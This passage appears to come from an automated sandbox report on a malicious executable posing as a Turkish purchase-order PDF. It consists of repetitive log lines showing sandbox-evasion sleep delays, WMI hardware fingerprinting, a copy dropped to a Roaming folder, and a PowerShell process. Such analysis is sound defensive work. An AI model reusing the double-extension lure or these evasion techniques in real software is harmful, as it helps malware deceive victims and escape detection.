                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2398653s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2398543s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2398432s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2398328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2398188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2398015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2397906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2397796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2397687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2397578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2397468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2397359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2397250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2397140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2397031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2396922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2396810s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2396703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2396594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2396484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2396375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2396265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2396156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2396046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2395937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2395827s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2395714s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2395587s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2395465s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2395358s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2395250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2395140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2395031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2394922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2394812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2394703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2394593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2394483s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2394375s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7864Thread sleep count: 4658 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2399843s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7864Thread sleep count: 5193 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2399734s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2399625s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2399515s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2399406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2399296s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2399187s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2399076s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2398968s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2398859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2398747s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2398560s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2398453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2398343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2398218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2398109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2398000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2397890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2397781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2397672s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2397562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2397452s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2397343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2397234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2397125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2397015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2396906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2396797s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2396684s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2396577s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2396468s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2396359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2396244s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2396133s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2396031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2395922s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2395812s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2395703s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2395593s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2395484s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2395375s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2395265s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2395156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2395047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2394937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2394828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2394718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2394609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2394500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860Thread sleep time: -2394390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7972Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -23980767295822402s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2400000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8092Thread sleep count: 2572 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2399890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8092Thread sleep count: 7283 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2399778s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2399656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2399484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2399349s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2399224s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2399094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2398984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2398875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2398747s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2398625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2398516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2398391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2398266s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2398156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2398047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2397937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2397828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2397719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2397609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2397500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2397390s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2397281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2397172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2397052s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2396922s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2396812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2396703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2396594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2396469s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2396359s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2396250s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2396141s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2396031s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395922s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395593s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395265s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395042s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394825s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394718s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394541s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394218s >= -30000s
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399875Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399765Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399656Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399531Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399421Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399312Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399195Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399093Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398984Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398874Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398765Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398653Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398543Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398432Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398328Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398188Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398015Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397906Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397796Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397687Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397578Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397468Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397359Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397250Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397140Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397031Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396922Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396810Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396703Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396594Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396484Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396375Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396265Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396156Jump to behavior
